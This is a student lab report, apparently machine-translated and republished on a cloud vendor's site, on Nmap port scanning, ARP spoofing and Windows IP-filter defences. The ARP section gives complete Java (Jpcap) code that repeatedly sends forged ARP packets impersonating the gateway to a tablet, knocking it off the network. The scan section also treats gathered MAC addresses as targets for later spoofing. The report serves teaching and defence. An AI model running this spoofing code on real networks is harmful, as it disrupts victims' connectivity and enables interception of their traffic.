Information security Technology Experiment Two network scan experiment +arp attack

Source: Internet
Author: User
Tags get ip


First, the purpose and requirements of the experiment


1, understand the scanning technology working principle;
2, deepen the understanding of the bottom of the network;
3, master the basic usage of common scanning tools;
4, the basic method of learning Scanner program design. (Add later)


Second, the experimental environment and related conditions (including the use of software, laboratory equipment, major instruments and materials, etc.)


1, experimental equipment: microcomputer;
2, software system: Windows 7 operating system, Nmap.


Iii. contents of the experiment


1, installation of Nmap under the Windows platform.
2, the use of nmap under the Windows platform.
3. View the local port under Windows platform.
4, the port scanning protection.


Iv. Experimental steps and results (including a brief procedure of the experimental steps, a concluding statement, attached pages) (0) Other knowledge preparation 1, view the native IP configuration information on windows: ipconfig


(1) Click "Start", "Run", enter "cmd", open a Command Prompt window, enter: Ipconfig/all
Such as:


2. View the native port on Windows: Netstat


(1) Click "Start", "Run", enter "cmd", open a Command Prompt window, enter: Netstat
Such as:

(2) Detailed parameters
The netstat is used to display statistics related to IP, TCP, UDP, and ICMP protocols, and is typically used to verify the network connectivity of each port on the machine.
NETSTAT [-A] [-b] [-e] [-n] [-O] [-P proto] [-r] [-S] [-v] [interval], Command Prompt window, enter: NETSTAT/?

(3) Example description
First, after opening the command Prompt window, enter: Netstat-a, such as:



Second, take a line to explain:

Protocol (Proto): TCP, refers to the Transport Layer Communication Protocol
Local machine name: 10.92.69.12, computer name, port opened locally and used for connection: 1156
Remote machine name (Foreign Address): such as 112.90.78.141
Remote port: 8080
Status: Established



Third, add: Status list
LISTEN: In the listening state.
Established: An online situation has been established.
Time_wait: The online is now waiting for the status.


(i) Installing Nmap on the Windows platform


Description: This experiment was mostly done in Windows Command Prompt window, and did not use the graphical interface tool to Nmap.


1, from the official website of nmap download Namp installation program.


Official website https://nmap.org/download.html


2, Installation Namp program


Double-click the installer to perform the installation, all by default. Installing Namp under the Windows platform requires the installation of a packet capture library WINPACP, which helps its callers, such as Nmap and Wireshark, to capture raw data transmitted over the network card.


3. Test whether the installation is successful


(1) After the installation is complete, click "Start", "Run", enter "cmd", then press ENTER "Enter" to enter the command Prompt window. Input command: Ipconfig/all

Find the Gateway ip:10.29.32.254



(2) Enter the following command: Nmap-sa 10.29.32.254. Indicates an ACK scan of the gateway. The results are as follows:

You can see the following information,
The time to start scanning is: 2016-10-18 09:17 China Standard Time
The host scanned is: 10.29.32.254
Scan host Status: Up, boot
All of scanned ... unfiltered ... : Indicates that there are 1000 scanned ports on the host 10.29.32.254 without firewalls and packet filtering software to isolate Nmap's probing scans.
MAC address is: 00:1a:a9:15:49:07 (this information is very useful, later we can use ARP attack)
The time taken for the scan is: 20.39 seconds
At this point, you can determine that the installation was successful.


4, improve the performance of the connection scan


(1) Enter the installation directory of Nmap, such as C:\Program files (x86) \nmap, locate the Nmap_performance.reg file

(2) Double hit open Nmap_performance.reg file

(3) After pressing OK, the registry is added successfully.


(ii) Use NMAP1 on the Windows platform and Ping scan to detect hosts


Command: Nmap-sp 10.29.32.1-254. Indicates that a ping scan is used to scan the open hosts in the LAN.
(1) scan for the first time, the results are as follows:

(2) Scan the second time, the results are as follows:

(3) Scan the third time, the result is as follows:

After multiple scans (if you are not afraid of trouble, you can scan multiple times), you can get IP and MAC address information for the following hosts
10.29.32.48 00:90:f5:f9:cc:a5
10.29.32.254 .....
10.29.32.17 .....
PS: Know these, later can be used to them with ARP spoofing attack.


2. Detecting operating system type


Command: NMAP-O IP address. Represents a host that detects IP 10.29.32.48 in a local area network.
(1) Input nmap-o 10.29.32.48, results

As you can see, the status of the host is down, but the result we scanned earlier is up. So speculate that there is a firewall on the host. Scanning with TCP/IP fingerprint feature is not feasible.
(2) Input nmap-o 10.29.32.254, results

You can see the following information:
Host Status: Up
999 Closed ports
Open ports: Only one. 23/tcp Open Telnet. Represents the TCP protocol, which occupies Port 23 and provides a Telnet service.
MAC Address: 00:1a:a9:15:49:07
Operating system: cannot scan the exact operating system
。。。。
NET Distance: Network Distance:1 hop. Represents only 1 hops, which is a router.
Time spent scanning: 33.60 seconds.
(3) Input nmap-o 10.29.32.17, results

You can see the information:
Host Status: Up
989 filtered ports: Filtered ports indicates that the port is obscured by firewalls, packet filtering, and other network security software, such as guards.
Open ports: Shown in the figure "}"
MAC Address: 2c:41:38:01:a8:00
Operating system: Microsoft Windows 7 or Phone or Vista or 2008
。。。。
NET Distance: Network Distance:1 hop. Represents only 1 hops, which is a router.
Time spent scanning: 26.38 seconds.
(4) Add: You can also use Nmap to scan a Linux host, but basically useless. Because of the high security of Linux, and the general cloud host will have security Group Policy, and generally only open a small number of ports, such as 22, 8080, 3306 these. So it's not tested here.


3. TCP connection Scan (-st indicates TCP full connection scan)


(1) Input nmap-st 10.29.32.48, results

You can see that the red Line part of the information:
5357 Port/tcp Protocol, status Open, Microsoft Windows WSDAPI service available
(2) Input nmap-st 10.29.32.254, results

You can see that the red Line part of the information:
23 Port/TCP Protocol, status Open, Telnet service available
(3) Input nmap-st 10.29.32.17, results


4. TCP Synchronous Scan (-SS indicates TCP half-open scan, TCP SYN)


(1) Input nmap-ss 10.29.32.48, results

As can be seen, the use of the TCP half-open scanning time of 32.60s, and the above with TCP full connection scanning the same host 10.29.32.48 using the time of 61.25s comparison, you can find that the TCP half-open scan faster than the TCP full-connection scan.
(2) Input Nmap-ss 10.29.32.254, the result is almost, do not repeat.
(3) Input Nmap-ss 10.29.32.17, the result is almost, do not repeat.


5. Covert scanning


(1) Input nmap-sf 10.29.32.48, nmap-sf 10.29.32.254, NMAP-SF 10.29.32.17 respectively, results

As you can see, the port opened by the target host could not be discovered using the Fin scan method.
(2) Input nmap-sx 10.29.32.48, nmap-sx 10.29.32.254, nmap-sx 10.29.32.17 respectively, results

As you can see, the target host's open ports were not discovered using the Xmas tree scan method.
(3) Input nmap-sn 10.29.32.48, nmap-sn 10.29.32.254, Nmap-sn 10.29.32.17 respectively. Results slightly.


6. Summary


Through the above 5 experiments, we can get the following conclusions: the use of TCP full-connection scan to obtain more complete information, but it takes a long time; TCP half-open scan, that is, TCP SYN scan to get more information, but it takes less time than TCP full-connection scanning, covert scanning takes less time, But less information is available.


(iii) ARP attack 1, Description:


The above network scan is a passive network attack, then let us introduce the active network attack: ARP spoofing. First of all, do not in the dormitory or public LAN free use of the attack, or network management to find the door GG. So next I use cell phones, tablets and laptops to make a simple LAN. The mobile phone turns on the hotspot, which is equivalent to a gateway, which is connected to a laptop and tablet, and is equivalent to two hosts in the local area network. :


2, Arp simple introduction. Add: These Baidu Encyclopedia has, detailed content self-Baidu. I only highlight the key points.


The Address Resolution protocol, known as ARP Resolution Protocol, is a TCP/IP protocol that obtains physical addresses based on IP addresses . When the host sends the message, the ARP request containing the destination IP address is broadcast to all hosts on the network , and the return message is received to determine the physical address of the target, and when the return message is received, the IP address and physical address are stored in the native ARP cache and retained for a certain amount of time. Query the ARP cache directly on the next request to conserve resources. The Address Resolution Protocol is based on the trust of each host in the network, the host on the network can send the ARP reply message autonomously , and the other host will not detect the authenticity of the message when it receives the response message, it is recorded into the native ARP cache; This allows an attacker to send a pseudo-ARP reply message to a host so that the information it sends fails to reach the intended host or to the wrong host, which constitutes an ARP spoofing . The ARP command can be used to query the corresponding relationship between the IP address and MAC address in the native ARP cache, add or remove static correspondence, and so on. The relevant protocol has RARP, proxy ARP. NDP is used to replace the address Resolution Protocol in IPV6.
In this case, simply speaking, the laptop (the attacker) sends a fake ARP response message to the tablet (the attacker), causing the MAC address of the IP address in the tablet's ARP cache table to be incorrect, causing the tablet computer to send to the corresponding IP host the information is not reached.



to view the ARP cache table command: Arp-a. Results such as


3. ARP Spoofing principle


The Address Resolution Protocol is based on the trust of each host in the network , and its birth makes the network run more efficiently, but it also has its own defects:
ARP address translation table is dependent on the computer cache memory Dynamic update, and cache update is limited by the update period, only the most recently used address mapping table entries , which gives attackers an opportunity to The Address Translation table can be modified before the Cache Memory Update table entry to implement the attack. The ARP request is sent in the form of broadcast, the host on the network can send the ARP reply message autonomously , and when the other host receives the reply message, it will not detect the authenticity of the message and record it in the local MAC address translation table. This allows an attacker to tamper with the local MAC address table by sending a pseudo-ARP response message to the target host.
Arp attack is to realize ARP spoofing by fake IP address and MAC address, can generate a large amount of ARP traffic in the network to block the network, the attacker can change the IP-MAC entry in the target host ARP cache as long as the bogus ARP response packet is continuously issued . (That is, the ARP cache table), causing network outages or man-in-the-middle attacks.
For example:
The attacker sends a bogus ARP response to computer A, Tell the Computer A: Computer B's IP address 192.168.0.2 the corresponding MAC address is 00-aa-00-62-c6-03, computer A believed, the correspondence is written to its own ARP cache table, and later when sending data, the data should be sent to Computer B sent to the attacker. Similarly, the attacker sends a bogus ARP response to Computer B, telling the computer B: Computer A's IP address 192.168.0.1 the corresponding MAC address is 00-aa-00-62-c6-03, and Computer B sends the data to the attacker.
At this point the attacker controls the traffic between PC A and computer B, and he can choose to passively monitor traffic, acquire passwords and other secret information, and falsify data to change the communication between Computer A and computer B.


4, the harm of ARP spoofing


ARP spoofing can cause the target computer to fail communication with the gateway, which will lead to traffic redirection, and all data will pass through the attacker's machine, so there is a great security risk.


5. ARP Message format (Key!!!) )




6. Implement ARP attack with Java, deceive other hosts in LAN (emphasis, practice)


(1) Install the WinPcap. Search to see how to download it. Since the installation of Nmap has been installed together WinPcap, so this step can be omitted.
(2) Copy the Jpcap.dll to the JDK Bin directory (note: Jpcap.dll and Jpcap.jar are easier to find, note the 32-bit or 64-bit can, here do not repeat)
(3) Import the Jpcap.jar package into the project

(4) Mobile phone on Wi-Fi hotspot, laptop and tablet computer access WiFi. When you open a command Prompt window, enter: The network configuration that the IPCONFIG/ALL,DHCP server (that is, the phone) assigns to the notebook computer.

You can see that the network configuration information for this host is
The assigned IP is: 192.168.43.69
Subnet mask is: 255.255.255.0
The Gateway is: 192.168.43.1
The MAC address of the wireless network card is: B8-EE-65-AA-D9-B9
(5) using the Nmap network scan just learned above, that is, open a command Prompt window, enter: Nmap-sp 192.168.43.1-254. Results

It can be found that the LAN has three hosts. The respective network configurations are as follows:
Mobile ip:192.168.43.1 Mobile phone mac:24:1f:a0:07:f4:9d
Tablet PC ip:192.168.43.244 Tablet PC mac:4c:fb:45:e2:3f:97
Native ip:192.168.43.69
(6) Java Code 1: implements a spoofed and unicast ARP Request packet.
Description: This code is implemented by the laptop as an attacker, to the tablet (the attacker) to send ARP Request messages, but the message changed the true gateway Ip-mac correspondence, The Real Gateway MAC address in the message is replaced by a fake MAC address (which can also be the MAC address of the laptop attacker), which deceives the tablet. As long as the program has been sending ARP request messages, the tablet will always be spoofed, sending packets that should have been sent to the gateway (mobile phones) to a bogus MAC address (or an attacker's laptop), which can cause a network break or slow speed.


 PackageArpattack;Importjava.net.InetAddress;ImportJava.net.UnknownHostException;ImportJava.util.Scanner;ImportJpcap. Jpcapcaptor;ImportJpcap. Jpcapsender;ImportJpcap.networkinterface;ImportJpcap.packet.ARPPacket;ImportJpcap.packet.EthernetPacket;/** * ARP Response protocol message * * @author ding * */ Public  class arpattack {  Public Static void Main(string[] args)throwsException {//select NicNetworkInterface device = Getnetworkinterface ();//Open Network cardJpcapsender sender = Jpcapsender.opendevice (device);//Build ARP Reply packageArppacket arppacket = Createarppacket ();//Set the re-send interval time, control the packet speed intTime =0;//Send ARP Reply package  while(true) {System.out.println ("Sending ARP:");            Sender.sendpacket (Arppacket); Thread.Sleep (Time * -); }    } Public StaticArppacketCreatearppacket()throwsunknownhostexception {//Start setting ARP packets, that is, ARP packets used to modify the ARP cache table of other hostsArppacket Arppacket =NewArppacket ();//Hardware type: Select the Ethernet type (Ethernet). Supplemental Knowledge: If it is Ethernet then the hardware type is: 0001. Arppacket.hardtype = Arppacket.hardtype_ether;//protocol type: Select the IP network protocol type. Supplemental Knowledge: This is generally written: 0800 means IP type, ARP is one of the IP protocol family. Arppacket.prototype = arppacket.prototype_ip;//Op for operator: Select the reply type. Supplemental Knowledge: If 1 is the request package, and 2 is the response package. Arppacket.operation = Arppacket.arp_request;//Hardware address length: Refers to the length of the MAC address, the length is 6 units bytes. Arppacket.hlen =6;//Protocol address length: if it is IP4 then this value is 4, in bytes. Arppacket.plen =4;//Send-side MAC address. Because it is a spoofed ARP packet, it can be set arbitrarily .ARPPACKET.SENDER_HARDADDR = Tomacbytes ("00-01-02-03-04-05");//Send-side protocol address (IP address). Impersonate the IPARPPACKET.SENDER_PROTOADDR = Toipbytes ("192.168.43.1");//Destination MAC address (to be populated). Because it is a spoofed ARP packet, it can be set arbitrarily .ARPPACKET.TARGET_HARDADDR = Tomacbytes ("00-00-00-00-00-00");//Destination protocol address (IP address). Spoofing the IPARPPACKET.TARGET_PROTOADDR = Toipbytes ("192.168.43.244");------**/of/**-----ARP protocol messages //Set DLC frames, i.e. Ethernet frames. or create an Ethernet header.Ethernetpacket ether =NewEthernetpacket ();//Ethernet Source Address: Is the host address that is emitted to the ARP packet.  //I test, need to be the real MAC address of the attacker, here is the MAC address of the native wireless network cardEther.src_mac = Tomacbytes ("B8-EE-65-AA-D9-B9");//Ethernet destination address, the real MAC address of the attacker. or by broadcast address: Ff-ff-ff-ff-ff-ffEther.dst_mac = Tomacbytes ("4c-fb-45-e2-3f-97");//Select the packet type of Ethernet. Supplemental knowledge: Used to indicate the type of upper layer protocol, if it is the ARP protocol: 0806. Ether.frametype = Ethernetpacket.ethertype_arp;//before adding the Ethernet packet header to the ARP packetArppacket.datalink = ether;returnArppacket; }/** * Select the network card through the console * * @return  */ StaticNetworkInterface Getnetworkinterface () {//Enumerate network cardsnetworkinterface[] devices = Jpcapcaptor.getdevicelist (); for(inti =0; i < devices.length; i++) {byte[] mac = devices[i].mac_address; SYSTEM.OUT.PRINTLN (i +":"+ integer.tohexstring (mac[0]) +"-"+ integer.tohexstring (mac[1]) +"-"+ integer.tohexstring (mac[2]) +"-"+ integer.tohexstring (mac[3]) +"-"+ integer.tohexstring (mac[4]) +"-"+ integer.tohexstring (mac[5])); }//Console select NicSystem.out.println ("Please enter the corresponding digital selection network card"); Scanner sc =NewScanner (system.in);        NetworkInterface device = Devices[sc.nextint ()]; Sc.close ();returnDevice }/** * Convert IP character type to byte type * * @param ipstring * @return * @throws Unknown Hostexception * * Static byte[] Toipbytes (String ipstring)throwsunknownhostexception {returnInetaddress.getbyname (ipstring). GetAddress (); }/** * Convert Mac character type to byte type * * @param macstr * @return * / Static byte[] Tomacbytes (String macstr) {byte[] Mac =New byte[] { (byte)0x00, (byte)0x00, (byte)0x00, (byte)0x00, (byte)0x00, (byte)0x00}; string[] S1 = macstr.split ("-"); for(intx =0; x < s1.length; X + +) {Mac[x] = (byte) ((Integer.parseint (S1[x], -)) &0xFF); }returnMac }}


Add: Just to illustrate the principle of ARP spoofing, the code does not take into account the robustness and reusability of the code. You can decouple yourself.
(7) The result of running the code: The tablet computer is disconnected or the network speed is slow. if int time = 0, the network is broken.
And when you open Wireshark crawl packets, you will find a large number of ARP messages. As shown in the following:

When you open a packet to observe, such as:



(8) Java Code 2: the implementation is to forge and broadcast ARP request packets. Be free to add.
(9) Java Code 3: the implementation is a forgery ARP packet reply. Be free to add.


7. Limitations of ARP Attack


ARP attacks can only be carried out on Ethernet (LAN such as: Computer room, intranet, company network, etc.).
It is not possible to attack on the external network (Internet, LAN in non-local area).


(d) Prevention of port scanning. 1. Principle


Generally speaking, all ports open to the computer are potentially dangerous. Some of the necessary communication ports (such as 80, 8080) cannot be shut down, but we can turn them off for most ports, especially Windows systems. Therefore, the port can be managed according to different situations, thereby reducing the security risk.


2. Method 1: Turn off unwanted network services (take Windows as an example)


Some operating systems start some services by default, but for some users, these services are not necessary. Therefore, you can disable access to such ports by stopping these services. The steps are as follows:
(1) "Management Tools", "Control Panel", "Services"

(2) Select the service that needs to be stopped, right click on the mouse, click "Stop" in the pop-up menu. This method is relatively simple, so do not repeat here.


3. Method 2: Set IP filters (take windows as an example)

When you cannot close a port by stopping the service, you can use the method that sets the IP filter. The steps are as follows:
(1) Open a Command Prompt window and enter secpol.msc.

(2) Open the Local Security Policy window, right-click IP Security Policy on local computer, and select click Create IP Security Policy (C).

(3) Click "Next", modify the name, add a description, and then click "Next".

(4) Depending on the circumstances, do not check the "Activate Default response rule (only for earlier versions of Windows)", I do not tick, and then click "Next".

(5) Remove the Tick "Edit Properties" and click "Finish".

(6) Back to the Local Security Policy window, you can find a new "Hui Elder's IP security policy." Right-click it and choose Properties.

(7) In the pop-up "XXX IP Security Policy Properties" menu, remove the Tick "Use Add Wizard", then click "Add (D)"

(8) In the new Rule Properties menu that pops up, select the IP Filter List tab, and then tap Add (D)

(9) In the "IP filter List" menu that pops up, change the name, remove the Tick "Use Add Wizard", and click "Add (D)"

(10) In the IP Filter Properties menu that pops up, select the Address tab, press settings

(11) Select the "Protocols" tab, press Settings, and then press "OK"

(12) Select the IP filter that you just created, and then click OK

(13) Go back to the new Rule Properties menu, select the Filter Actions tab, remove the Tick "Use Add Wizard", click "Add"

(14) In the New Filter action Properties menu that pops up, the security method is set to block, and then apply, OK.

(15) Go back to the Filter Actions tab in the new Rule Properties menu, select the new filter action that you just created, and click Apply, OK.

(16) Go back to the IP Filter List tab in the new Rule Properties menu, select the XXX filter list that you just created, and then click Apply, OK.

(17) Go back to the new completed "XXX IP Security Policy Properties" menu, select the IP filter that you just created, and then click Apply, OK.

(18) Back to the Local Security policy window, right-click on "FAI's IP Security Policy" and select "Assign".

When you click Assign, the results are as follows:

(19) test
A: No prior to allocation, i.e.

On another host using NMAP scan, 135 ports are found to be turned on. (Port 80 is the port to be used by the HTTP protocol, which is enabled by default)

B: After distribution, that is

On another host using NMAP scan, 135 ports were found to be filtered.

Demonstrate the success of the experiment!
(20) control by using the "Negotiate security" and "Share secret key" methods.
First, in the New Filter Action Properties menu, the security method is set to negotiate security,

Next, on the Edit Rule Properties menu, select Authentication tab, click Add

Then, set the pre-shared secret key

Next, another computer (the target host that is scanned by the network) does the same.
Finally, the test found that the port is still directly filtered and has the same default private key that does not work. The cause of the problem is still being explored.

4, Method 3: Install the software firewall.


This method is easier, it is not to do the repeat.


V. Summary of experiments (including experience, questions and suggestions for improvement of the experiment)


1, through this test, understand the port scanner and vulnerability scanner basic principles.
2, through the use of NMAP this network scanner, scanning in different ways, and the resulting data analysis, the basic learned the use of the tool, and the port scanner and the basic principle of the vulnerability scanner to understand more deeply.
3, extended learning ARP attack, the network scan this passive attack and ARP attack this kind of active attack combined, for the host of the vulnerability analysis.
4, the Information technology security has a more profound understanding.



Information security Technology Experiment Two network scan experiment +arp attack


Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.